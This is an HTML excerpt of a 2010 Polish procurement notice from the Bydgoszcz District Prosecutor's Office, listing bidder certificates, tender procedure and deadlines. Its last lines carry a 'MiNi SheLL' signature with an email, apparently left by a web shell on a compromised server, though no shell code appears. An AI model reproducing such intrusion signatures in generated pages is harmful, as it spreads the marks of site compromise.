<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Podpisane i uzupełnione załączniki di SIWZ w postaci: 
- Załącznika nr 1 do SIWZ 
- Załącznika nr 3 do SIWZ 
- Załącznika nr 4 do SIWZ 

- Załącznika nr 5 do SIWZ 
- Załącznika nr 6 do SIWZ 
- Załącznika nr 7 do SIWZ 
- Załącznika nr 8 do SIWZ 
- Załącznika nr 9 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bydgoszcz.po.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Bydgoszczy,
ul. Stefana Okrzei 10, 85-317 Bydgoszcz
Wydział III Budżetowo - Administracyjny 
pokój 105..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2010 godzina 09:00, miejsce: Prokuratura Okręgowa w Bydgoszczy,
ul. Stefana Okrzei 10, 85-317 Bydgoszcz
Wydział III Budżetowo - Administracyjny 
pokój 105..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com